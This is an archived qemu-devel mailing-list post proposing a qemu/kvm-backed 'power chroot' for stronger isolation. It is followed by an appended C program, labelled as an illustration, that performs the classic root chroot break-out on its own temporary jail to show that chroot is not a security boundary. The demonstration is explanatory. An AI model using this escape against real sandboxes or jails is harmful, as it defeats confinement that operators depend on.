From: Liraz Siri <liraz@turnkeylinux.org>
To: qemu-devel@nongnu.org
Subject: [Qemu-devel] simulating a chroot-like interface with qemu
Date: Mon, 05 Jan 2009 17:05:31 +0200
Message-ID: <496221BB.8010909@turnkeylinux.org>

I'd like to run by you guys an idea I've been playing around with.

We've recently cut down in our use of qemu/kvm in our development
toolchain for TurnKey Linux and instead switched to using chroot for
many things, mainly because it is lighter and easier to script which
translates into reduced overhead during development.

On the flip side there are many downsides to using chroot:

* requires root privileges. You can get around this by giving a program
  suid privileges but that's dangerous because...
* root processes inside the chroot can easily break out
* processes inside the chroot share the network stack with processes
  outside the chroot.

  So for example, if mysql is running with the default configuration
  inside a VM and binds to port 3306 that will work even if the host is
  also running mysql listening to 3306. If you're using chroot there is
  an additional overhead requiring you to reconfigure things.

* similarly, processes inside the chroot share the same abstract unix
  socket namespace, which complicates some usage scenarios...

I'm thinking maybe for some uses it would be useful to simulate an
interface that looks and functions like chroot but is magically
implemented with qemu/kvm behind the scenes (e.g., separate kernel,
network stack, etc.).  Sort of a power chroot that offers stronger
isolation/compartmentalization but with a similar unixish interface
(e.g., pipeable, scriptable, etc.)

Perhaps rather than mounting a block device, the guest could access its
root in the host filesystem transparently via a network filesystem of
some kind.

What do you think? Has anyone tried to use qemu to do something like
this before? Would it be difficult to implement?

Cheers,
Liraz
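
The second downside listed above (a root process inside a chroot can easily break out) is the textbook reason chroot is not a security boundary. The following program, added here as an illustration and not part of Liraz's post or of any QEMU code, builds an empty jail under /tmp, enters it, confirms the host's /etc/passwd is no longer reachable, and then performs the classic escape: create a subdirectory, chroot() into it without chdir()ing, so the working directory is now outside the new root, walk ".." up to the real root (the kernel only refuses to climb past the *current* root) and chroot(".") there. It assumes Linux with CAP_SYS_CHROOT (i.e. running as root) and a writable /tmp; without the capability it reports that it could not demonstrate anything rather than failing. The directory names and result codes are chosen for this example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Outcome codes returned by chroot_escape_demo() (names chosen for this example). */
enum demo_result {
    DEMO_ESCAPED = 0,       /* escape worked: the host tree is visible again */
    DEMO_STILL_JAILED = 1,  /* chroot() calls succeeded but the escape did not */
    DEMO_UNPRIVILEGED = 2,  /* no CAP_SYS_CHROOT: nothing could be demonstrated */
    DEMO_SETUP_FAILED = 3   /* mkdtemp/chdir failed for an unrelated reason */
};

/*
 * Classic chroot break-out, run from inside a jail whose cwd is the jail root.
 * chroot() moves only the process's root, not its cwd, and ".." is clamped
 * only at the current root.  So: make a subdirectory, chroot into it without
 * chdir'ing (cwd is now outside the new root), climb ".." until the real "/"
 * is reached, then chroot(".") to make that the root again.
 */
static int break_out(void)
{
    if (mkdir("escape", 0700) != 0 && errno != EEXIST)
        return -1;
    if (chroot("escape") != 0)
        return -1;
    for (int i = 0; i < 64; i++) {   /* more levels than any realistic path depth */
        if (chdir("..") != 0)
            return -1;
    }
    return chroot(".");
}

int chroot_escape_demo(void)
{
    char jail[] = "/tmp/chroot-demo-XXXXXX";   /* constructed temporary jail */
    char sub[sizeof(jail) + 8];

    if (mkdtemp(jail) == NULL)
        return DEMO_SETUP_FAILED;

    /* Enter the empty jail: nothing from the host tree is reachable from here. */
    if (chroot(jail) != 0) {
        int saved = errno;
        rmdir(jail);
        return saved == EPERM ? DEMO_UNPRIVILEGED : DEMO_SETUP_FAILED;
    }
    if (chdir("/") != 0)
        return DEMO_SETUP_FAILED;

    /* Sanity check: the host's /etc/passwd must be invisible inside the jail. */
    if (access("/etc/passwd", F_OK) == 0)
        return DEMO_SETUP_FAILED;

    if (break_out() != 0)
        return DEMO_STILL_JAILED;

    /* Back at the real root: the host tree is reachable again.  Tidy up. */
    if (access("/etc/passwd", F_OK) != 0)
        return DEMO_STILL_JAILED;
    snprintf(sub, sizeof(sub), "%s/escape", jail);
    rmdir(sub);
    rmdir(jail);
    return DEMO_ESCAPED;
}

int main(void)
{
    static const char *names[] = {"escaped", "still jailed",
                                  "unprivileged", "setup failed"};
    int r = chroot_escape_demo();
    printf("chroot escape demo: %s\n", names[r]);
    return r;
}
```

Run it as root (`sudo ./chroot_demo`) to see "escaped"; as an unprivileged user the first chroot() fails with EPERM and it prints "unprivileged". The point for the proposal in the post is that a guest kernel under qemu/kvm gives the process no equivalent of this walk: the guest's "/" is a separate filesystem view and its root user has no syscall that reaches the host's.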

Thread overview: 3+ messages
2009-01-05 15:05 Liraz Siri [this message]
2009-01-06 14:05 ` [Qemu-devel] simulating a chroot-like interface with qemu Avi Kivity
2009-01-06 15:17   ` Liraz Siri
